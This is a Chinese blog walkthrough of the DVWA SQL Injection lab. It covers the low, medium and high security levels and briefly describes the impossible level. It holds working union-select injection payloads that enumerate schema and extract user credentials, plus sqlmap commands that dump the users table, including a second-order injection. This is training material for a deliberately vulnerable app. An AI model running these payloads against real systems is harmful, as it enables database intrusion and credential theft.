dvwa第一题:SQL Injection

最新推荐文章于 2024-06-17 17:42:40 发布
最新推荐文章于 2024-06-17 17:42:40 发布
阅读量282 收藏
点赞数
分类专栏: main之dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuqangy/article/details/104225841
版权

---level: low---

该级别的网页会把服务器报错信息和查询数据显示出来。

#寻找注入点

http://localhost/vulnerabilities/sqli/?id=1

http://localhost/vulnerabilities/sqli/?id=1'

http://localhost/vulnerabilities/sqli/?id=1' and 1=1

http://localhost/vulnerabilities/sqli/?id=1' and 1=2

#正常参数
http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit

#查询是否为注入点
http://localhost/vulnerabilities/sqli/?id=1'&Submit=Submit

#爆数据库
http://localhost/vulnerabilities/sqli/?id=1' union select 1,database()-- &Submit=Submit

#爆库表
http://localhost/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables where table_schema='dvwa'-- &Submit=Submit

#爆表字段
http://localhost/vulnerabilities/sqli/?id=1' union select 1,column_name from information_schema.columns where TABLE_NAME='users'-- &Submit=Submit

#表数据
http://localhost/vulnerabilities/sqli/?id=1' union select 1,concat(user,password) from users-- &Submit=Submit

 

 

 

 

---level: medium---
post请求数据,url中不可见,需要用blurpsuite,并且服务后台做了特殊字符转义,所以sql语句不能使用\x00,\n,\r,\,’,”,\x1a,具体的值通过sql语句获得。

#爆当前使用数据库名

id=2 union select 1, table_name from information_schema.tables where table_schema=database()-- &Submit=Submit

#爆表名
select table_name from information_schema.tables where table_schema=database()

#爆字段
id=2 union select 1, column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 1,1)-- &Submit=Submit

#爆数据
id=1 union select 1, concat(user,password) from users-- &Submit=Submit

sqlmap -u "http://192.168.43.140/vulnerabilities/sqli" --data "id=1&Submit=Submit#" --cookie="PHPSESSID=q5fhguekr1jlmp3dnggoahajbt; security=medium" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump

 

 

 

 

---level: high---

跟之前级别一样,只是多了个二阶注入,注入点页面和结果页面为两个页面。
sqlmap -u "192.168.43.140/vulnerabilities/sqli/session-input.php#" --second-url "http://192.168.43.140/vulnerabilities/sqli" --data "id=1&Submit=Submit#" --cookie="PHPSESSID=1sfidb68smb7koe3j0o7m44hf7; security=high" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump

 

 

 

---level: impossible---

后台采用Anti-CSRF token机制,有效提高了安全机制,并使用预编译存储过程加强了参数的合法性

 

 

 

 

环境:

dbms:mysql
ossystem:win server2016
dwvaserver
apache
php

yuqangy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA参考答案
10-03
该答案为参考答案,突破漏洞的方法有多样,本文档提供一个参考。方便后人学习。
DVWA练习之SQL Injection
dz919908651的博客
08-27 1491
DVWA练习之SQL Injection 本博客将记录在web安全问中一种常见的漏洞——“SQL注入”漏洞的实践演练。首先阐述SQL注入漏洞的概念,原理,最后展示基于DVWA的各种等级的SQL注入漏洞。 SQL注入 概念:指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如...
网络安全 DVWA通关指南 SQL Injection(SQL注入)
最新发布
YueXuan_521的博客
06-17 1331
Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令。可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。布尔型盲注:根据返回页面判断条件真假时间型盲注:用页面返回时间是否增加判断是否存在注入基于错误的注入:页面会返回错误信息联合查询注入:可以使用union的情况下堆查询注入:可以同时执行多条语句使用参数化查询。数据库服务器不会把参数的内容当作SQL指令的一部分来拼接执行;而是在数据库完成SQL指令的编译后才套用参数运行(预编译)。
DVWA靶场第一关Brute Force(low级)
weixin_61178511的博客
01-29 1194
准备工作:1.首先我们要进行靶场的搭建 2. 还有一些要用到的工具的安装 3.在浏览器安装代理插件 4.以及打开电脑代理 地址和端口是我相应127.0.0.1和8080 准备工作完毕之后 开始登录,初始账号密码分别为admin和password。 进入后我们先点击DVWA Security将难度调为low级 接下来随便输入账号密码,并打开浏览器的代理,打开Brup Suite的拦截,开始抓包 Raw中弹出如上页面代表抓包成功,我们点击行动将其发送给Intrude...
dvwasqli
qq_39926171的博客
04-18 496
Low: 源代码: 什么都没过滤,直接给变量。用了引号应该是字符注入。 1 or 1=1 1 or 1=2 非数字型. 1‘ 1’ or ‘1’=’1 为字符型。 科普: 1’ union select database(),version 有limit限制。加#将后面的注释掉 1’ union select database(),version()# 1’ order by 2#...
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 1191
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
DVWA下的SQL Injection(Blind)
07-25
盲注
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
2020-12-06-DVWAsql.md
01-24
### DVWASQL Injection知识点详解 #### 一、SQL Injection概念 SQL InjectionSQL注入)是一种常见的Web应用程序安全漏洞,攻击者通过将恶意SQL代码插入应用程序的输入字段中,从而改变原有SQL语句的逻辑,进而...
DVWASQLI搭建
omh164052427的博客
02-22 403
准备工作:DVWA安装包 SQLI安装包 phpstudy2018(最新版会不兼容) 打开phpstudy2018,打开Apache功能与MYSQL功能,然后进入根目录,将两个安装包解压 之后DVWA找到config文件夹,将config.inc.php.dist去后缀变config.inc.php 通过notepad++将里面的账号密码修改 进入网页验证安装是否成功(账号密码为admin password) 之后找到sqli-labs-master文件夹中找到sql-conn..
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析(1)
2401_84253132的博客
04-29 943
这样的话估计不能使用Error注入。结论:字段为2。
渗透测试漏洞平台DVWA-参考答案
煜铭2011
10-03 1万+
0x00 前言 DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 0x01 下载安装XAMPP 1 下载地址:http://www.xampps.com/ 2 下载了压缩包:xampp_2016.zip,解压后点击xamp
DVWA练习(一) 使用AWVS暴力破解
Tru5tM3的博客
07-02 4805
DVWA练习(一) 使用AWVS暴力破解目录:DVWA练习一 使用AWVS暴力破解
DVWA系列(一)----DVWA简介
热门推荐
fendo
02-08 4万+
一、DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA是randomstorm的一个开源项目。如果你更多的了解randomstorm的服务和产品你可以访问他们官
DVWA靶场基础
ANDTM的博客
04-21 1681
1.SQL注入:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 (1 )查看源代码可知低级无过滤,当输入1有如下显示 但输入1’ or’ 1’ =’ 1就会显示数据库所有内容,之后再通过特定语句漏洞即可查出表名,列名以及表中内容。 2.SQL盲注:原理与SQL的注入相同,而盲注则是只有两种情况,即TRUE和FALS...
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值